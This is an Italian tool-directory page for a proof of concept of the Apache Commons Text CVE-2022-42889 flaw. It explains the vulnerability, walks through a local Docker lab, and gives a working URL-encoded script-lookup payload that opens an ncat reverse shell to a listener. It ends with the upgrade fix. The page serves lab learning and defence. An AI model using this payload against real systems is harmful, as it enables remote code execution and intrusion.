Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-42889-POC — Una semplice applicazione dockerizzata che mostra come sfruttare la vulnerabilità CVE-2022-42889. | Kitploit
Strumenti/GitHubGitHub/akshayithape-devops/cve-2022-42889-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHubakshayithape-devops/cve-2022-42889-poc

CVE-2022-42889-POC

Una semplice applicazione dockerizzata che mostra come sfruttare la vulnerabilità CVE-2022-42889.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
513 anni faNon ancora revisionato

CVE-2022-42889-POC

Proof of Concept per la vulnerabilità Apache commons-text CVE-2022-42889.

Qual è il problema :

Apache Commons Text esegue l'interpolazione di variabili, consentendo di valutare ed espandere dinamicamente le proprietà. Il formato standard per l'interpolazione è "${prefix:name}", dove "prefix" viene utilizzato per individuare un'istanza di org.apache.commons.text.lookup.StringLookup che esegue l'interpolazione. A partire dalla versione 1.5 e fino alla 1.9, l'insieme delle istanze Lookup predefinite includeva interpolatori che potevano provocare l'esecuzione di codice arbitrario o il contatto con server remoti. Questi lookup sono: - "script" - esegue espressioni utilizzando il motore di esecuzione di script JVM (javax.script) - "dns" - risolve i record DNS - "url" - carica valori da URL, inclusi server remoti. Le applicazioni che utilizzano le interpolazioni predefinite nelle versioni interessate possono essere vulnerabili all'esecuzione di codice remoto o a contatti non intenzionali con server remoti se vengono utilizzati valori di configurazione non attendibili.

Versioni interessate :

Apache Commons Text Versione 1.5 fino a 1.9

Guida passo passo per mostrare la vulnerabilità CVE-2022-42889-POC :

1. Costruisci l'applicazione usando Docker(Scheda 1 del terminale)

root@kitploit:~
docker build --tag=test/text4shell .

2. Esegui l'applicazione(Scheda 2 del terminale)

root@kitploit:~
docker run -it -p 80:8080 --name text4shell test/text4shell

3. Apri una nuova scheda del terminale ed esegui il comando qui sotto(Scheda 3 del terminale)

root@kitploit:~
docker exec -it text4shell /bin/bash

4. Ora è il momento di avviare il listener per la reverse shell sul tuo sistema locale(Scheda 4 del terminale)

root@kitploit:~
nc -nlvp 8888

5. Testa l'app (Scheda 5 del terminale)

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>

6. Ora è il momento di testare l'attacco (Scheda 5 del terminale)

L'attacco può essere eseguito passando una stringa "${prefix:name}" dove il prefisso è il lookup precedentemente menzionato: ${script:javascript:java.lang.Runtime.getRuntime().exec('ncat -e /bin/bash 172.17.0.1 8888')}

root@kitploit:~
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27ncat%20-e%20%2Fbin%2Fbash%20172.17.0.1%208888%27%29%7D

7. Vai alla Scheda 3 del terminale ed esegui i comandi qui sotto uno per uno

root@kitploit:~
pwd
cd /root
pwd
ls

8. Vai alla Scheda 5 del terminale ed esegui i comandi qui sotto uno per uno

root@kitploit:~
pwd
cd /root
pwd
ls
touch hacked.txt
ls

9. Vai alla Scheda 3 del terminale ed esegui i comandi qui sotto uno per uno

root@kitploit:~
pwd
ls

Se riesci a vedere il file hacked.txt nella Scheda 3 del terminale dopo il comando ls. L'attacco è stato eseguito.

10. Chiudi tutti i terminali

Come correggere questa vulnerabilità :

Si consiglia agli utenti di aggiornare ad Apache Commons Text 1.10.0, che disabilita gli interpolatori problematici per impostazione predefinita.

Ulteriori informazioni :

  • NVD-NIST
Scarica lo strumento